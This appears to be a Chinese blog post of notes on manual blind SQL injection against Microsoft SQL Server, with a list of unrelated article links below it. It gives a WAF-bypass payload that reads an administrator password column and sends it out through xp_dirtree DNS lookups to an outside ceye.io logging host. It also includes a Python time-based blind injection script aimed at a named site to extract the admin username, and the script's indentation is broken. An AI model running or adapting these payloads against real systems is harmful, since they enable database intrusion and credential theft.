mssql手工盲注
2024-09-07 11:05:06
遇到中文的列名
利用unicode 进行单字节的转换
declare @s varchar(50);
set @s = N'拉';
select UniCode(@s),nchar(UniCode(@s));
绕狗sql 方法
利用dnslog 进行sql
/xx.aspx?id='--/%2a%0a%3bDECLARE+%40host+varchar(1024)%3bSELECT+%40host%3dCONVERT(varchar(1024),(select+top+1+user_pwd+from+gt.dbo.dt_manager+where+id=1))%2b'.czj.pw2.lf0145.ceye.io'%3bEXEC('master..xp_dirtree+"\\'%2b%40host%2b'\foobar$"')%3b--%20a%2a/
中文回显
select nchar('21776')
URLdecode
/xx.aspx?id=1'--/* 2 ;DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 user_pwd from gt.dbo.dt_manager where id=1))+'.czj.pw2.lf0145.ceye.io';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');-- a*/
基于时间盲注脚本
import requests
import time
sqlstr=''
for i in range(1,33):
for j in range(47,130): url="http://cxxzx.cn/xx.aspx?xx=1'--/*%0a%3bif+(ascii(substring((select+top+1+user_name+from+gt.dbo.dt_manager+where+id=1),{},1)))={}+WAITFOR+DELAY+'0%3a0%3a6'--%20a*/".format(i,j) print url
stime = time.time()
r=requests.post(url)
etime = time.time()
if etime-stime>5:
sqlstr=sqlstr+chr(j)
print sqlstr
break
if j == 129:
quit() print sqlstr
我
最新文章
- BAT及各大互联网公司2014前端笔试面试题--Html,Css篇
- jquery checkbox实例
- .Net在线付款---Paypal在线付款开发过程
- nodejs - 如何完全更新
- SQL中join的用法
- Spring两种实现AOP的方式
- Java中的字符串驻留(String Interning)
- 如何使用 HTTP 响应头字段来提高 Web 安全性?
- 使用sqlplus批量执行脚本的总结
- C指针陷阱
- JS中通过call方法实现继承
- 关于IOS的屏幕适配(iPhone)——Auto Layout和Size Classes
- 转: .Net 4.0 ExpandoObject 使用
- Python之Pandas的一些理解
- canvas画圆角矩形的方法
- linux下编译upx ucl
- Python学习(八) —— 内置函数和匿名函数
- MySql 死锁时的一种解决办法【转】
- Direct3d 设备丢失 (device lost) (转载)
- 在kali linux之下安装wps之后 报错字体缺失